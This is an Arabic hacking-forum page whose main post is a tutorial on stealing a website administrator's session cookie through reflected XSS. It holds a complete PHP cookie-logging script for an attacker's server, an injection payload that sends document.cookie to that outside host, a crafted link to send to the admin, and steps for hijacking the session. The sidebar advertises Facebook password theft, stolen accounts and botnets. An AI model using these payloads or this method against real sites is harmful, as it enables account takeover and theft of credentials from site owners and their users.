منظمة الانونيموس الاسلامية للاختراق
اهلا بك فى منظمة انيموس الاسلامية للاختراق

دخول

لقد نسيت كلمة السر

بحـث
 
 

نتائج البحث
 


Rechercher بحث متقدم

المواضيع الأخيرة
» افضل برنامج لسرقة اميلات الفيس بوك Hack Facebook Password
الأربعاء 30 أغسطس 2017, 8:27 pm من طرف الهاكر الاسطوري

» 100 الف حساب فيس بوك هدية
الأربعاء 30 أغسطس 2017, 1:39 pm من طرف الهاكر الاسطوري

» اكواد اختراق
الثلاثاء 29 أغسطس 2017, 4:00 pm من طرف الهاكر الاسطوري

» طريقتي في جلب حسابات rdp
الجمعة 14 يوليو 2017, 12:34 pm من طرف mohamed-56

» Get 30 days VPS in 30 seconds
الإثنين 10 يوليو 2017, 10:03 pm من طرف alimohamede

» حصرياً :شرح التحميل من rdp الى حاسوبك بسرعة البرق
الإثنين 10 يوليو 2017, 8:27 pm من طرف moatazmazao

» شرح كامل لـ BotNet Mirc على سيرفرات IRC
السبت 01 يوليو 2017, 12:49 am من طرف mohmed elsayed

» RDP/VPS l Win2008 l 7-day Free Trial
الخميس 29 يونيو 2017, 2:29 pm من طرف MohamedZidan1170

» موقع يعطيك سيرفر في بي اس لمدة شهر - هديه لعيون المنظمه
الخميس 22 يونيو 2017, 12:27 pm من طرف R4Y3B

سبتمبر 2017
الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
    123
45678910
11121314151617
18192021222324
252627282930 

اليومية اليومية

تدفق ال RSS


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 


المتواجدون الآن ؟
ككل هناك 14 عُضو متصل حالياً :: 0 عضو مُسجل, 0 عُضو مُختفي و 14 زائر :: 1 روبوت الفهرسة في محركات البحث

لا أحد

[ مُعاينة اللائحة بأكملها ]


أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 176 بتاريخ الخميس 03 نوفمبر 2016, 12:28 am

سرقه الكوكيز والدخول الى لوحه التحكم

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

سرقه الكوكيز والدخول الى لوحه التحكم

مُساهمة من طرف Admin في الأحد 18 أغسطس 2013, 11:23 pm

بسم الله الرحمن الرحيم

شرح اختراق الموقع عن طريق تغرة اكس اس اس (xss)

الترغة هده منتشرة مثل تغرة السكيل بل تعتبر من تغرات الحقن

الطريقة تعتمد على سرقة الكوكيز الخاصة بالادمن والدخول للوحة

طبعا الكل يعرف كيف يتأكد من ان الموقع مصاب بالتغرة
غالبا تضع في الرابط او في مكان البحث الكود التالي
كود:
>***************("test")</script>
وطبعا في بعض الاحيان تحتاج الى تشفير الامر بالهيكس
والمواقع موجودة لتشفير بالهيكس
^_^
الطريقة تحتاج الى ثلاثة اشياء
ان يسمح الموقع المصاب بتسجيل الاعضاء + ملف بي اتش بي مرفوع على اي موقع + ملف تكست فارغ باسم log.txt (تقوم برفعه مع ملف البي اتش بي)
طبعا بعد التسجيل في الموقع
ندخل بالعضوية الخاصة فينا
ونقوم برفع الملف التالي من شل او استضافة تدعم رفع ملفات البي اتش بي
كود:
<?php

function GetIP()
{
   if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
       $ip = getenv("HTTP_CLIENT_IP");
   else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
       $ip = getenv("HTTP_X_FORWARDED_FOR");
   else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
       $ip = getenv("REMOTE_ADDR");
   else if (isset($_SERVER['REMOTE_ADDR']) &&  $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],  "unknown"))
       $ip = $_SERVER['REMOTE_ADDR'];
   else
       $ip = "unknown";
   return($ip);
}

function logData()
{
   $ipLog="log.txt";
   $****** = $_SERVER['QUERY_STRING'];
   $register_globals = (bool) ini_get('register_gobals');
   if ($register_globals) $ip = getenv('REMOTE_ADDR');
   else $ip = GetIP();

   $rem_port = $_SERVER['REMOTE_PORT'];
   $user_agent = $_SERVER['HTTP_USER_AGENT'];
   $rqst_method = $_SERVER['METHOD'];
   $rem_host = $_SERVER['REMOTE_HOST'];
   $referer = $_SERVER['HTTP_REFERER'];
   $date=date ("l dS of F Y h:i:s A");
   $log=fopen("$ipLog", "a+");

   if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
       fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : }  $date | ******:  $****** <br>");
   else
       fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |   Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE:  $date | ******:  $****** \n\n");
   fclose($log);
}

logData();

?>
اوك الان رفعنا الملف على موقع مثلا
http://server.com/file.php
وهذا ملف اللوغ
htp://server.com/log.txt
والموقع المصاب هو
Target : Expect More Pay Less

الان كل شيئ جهاز بقى فقط كود الحقن
كود:
"><script ********=  "**********">********.********="http://server.com/file.php?******=" +   ********.******;********.********="http://www.target.com"</script>
الان طريقة الاختراق تعتمد على ارسال كود الحقن الى الادمن (الكود الاخير)
طبعا في رسالة او على الاميل او اي شيئ
المهم لازم يضغط كليك على الرابط اللي سيكون في النهاية
كود:
http://target.com/search.php?q="><script ********=  "**********">********.********="http://yoursite.com/whateveryouwant.php?******="  +  ********.******;********.********="http://www.whateversite.com"</script>
تضع فقط كود الحقن بعد رابط الملف المصاب في الموقع وترسله الى الادمن
لما يدخل الادمن على الرابط ستجد الكوكيز في ملف اللوع log.txt اللي رفعنا مع ملف البي اتش بي
http:server.com/log.txt
مثال
كود:
كود PHP:
IP: xxx.xxx.xxx.xx| PORT: xxx| HOST:  |  Agent: Mozilla/5.0 (X11; U;  Linux i686; en-US; rv:1.9.0.Cool Gecko/2009032711 Ubuntu/8.10 (intrepid)  Firefox/3.0.8 | METHOD:  | REF: http://target.com/search.php |  

DATE: Tuesday 9th 2013f April 2013 05:04:07 PM | ******:  ******=PHPSESSID=889c6594db2541db1666cefca7537373
طبعا اللي يهمنا في اللوغ هو
PHPSESSID=889c6594db2541db1666cefca7537373
السيشن اي دي
ومن خلالها نعدل على الكوكيز الخاص فينا باستعمال احدى ادوات تعديل الكوكيز
وبمجرد عمل رفريش تجد نفسك ادمن

بالتوفيق للجميع يا منظمه الهكر
avatar
Admin
Admin
Admin

عدد المساهمات : 1255
تاريخ التسجيل : 22/11/2011
العمر : 21
الموقع : http://ahmed2012.yoo7.com

http://ahmed2012.yoo7.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى